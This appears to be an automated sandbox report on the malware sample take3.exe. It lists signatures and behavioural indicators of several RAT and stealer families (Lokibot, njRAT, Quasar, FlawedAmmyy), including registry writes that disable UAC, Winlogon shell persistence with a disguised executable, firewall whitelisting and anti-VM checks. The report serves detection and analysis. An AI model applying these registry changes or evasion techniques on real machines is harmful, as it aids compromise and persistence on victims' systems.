Malware Analysis Report

2025-01-23 11:56

Sample ID 241128-cbebqszndw
Target take3.exe
SHA256 9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
Tags
ammyyadmin flawedammyy lokibot njrat quasar office04 collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53

Threat Level: Known bad

The file take3.exe was found to be: Known bad.

Malicious Activity Summary

ammyyadmin flawedammyy lokibot njrat quasar office04 collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer trojan upx

AmmyyAdmin payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Njrat family

Ammyy Admin

Quasar payload

Modifies WinLogon for persistence

Lokibot family

FlawedAmmyy RAT

Ammyyadmin family

Lokibot

Flawedammyy family

Modifies firewall policy service

UAC bypass

Quasar family

njRAT/Bladabindi

Quasar RAT

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets file to hidden

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Uses browser remote debugging

Modifies Windows Firewall

Executes dropped EXE

Checks BIOS information in registry

Identifies Wine through registry keys

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Drops startup file

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses Microsoft Outlook profiles

Checks installed software on the system

Checks whether UAC is enabled

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

UPX packed file

Drops file in Program Files directory

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Program crash

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Access Token Manipulation: Create Process with Token

Browser Information Discovery

System Location Discovery: System Language Discovery

Detects Pyinstaller

NSIS installer

Views/modifies file attributes

Checks processor information in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

outlook_win_path

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Modifies data under HKEY_USERS

System policy modification

Runs ping.exe

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of WriteProcessMemory

Gathers network information

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 01:53

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 01:53

Reported

2024-11-28 01:56

Platform

win7-20241023-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2908 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2908 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29082\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 01:53

Reported

2024-11-28 01:56

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\Windows Security Health Host.exe," C:\Windows\SysWOW64\reg.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\seetrol\client\SeetrolClient.exe = "C:\\Program Files (x86)\\seetrol\\client\\SeetrolClient.exe:*:Enabled:SeetrolClient" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4312 created 3488 N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe C:\Windows\Explorer.EXE

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A

njRAT/Bladabindi

trojan njrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ew.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A
N/A N/A C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Downloads\UrlHausFiles\client.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\STClientChat.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\dtph.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\Uninstall.cmd C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.dll C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.dll C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.sys C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\dfmirage.inf C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\sas.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolClient.cfg C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\MirrInst64.exe C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.cat C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.inf C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.sys C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolClient.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\sthooks.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\STUpdate.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.sys C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\mdph.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\MirrInst32.exe C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\Install.cmd C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\dfmirage.cat C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.dll C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Music\Windows Security Health Host.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\client.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
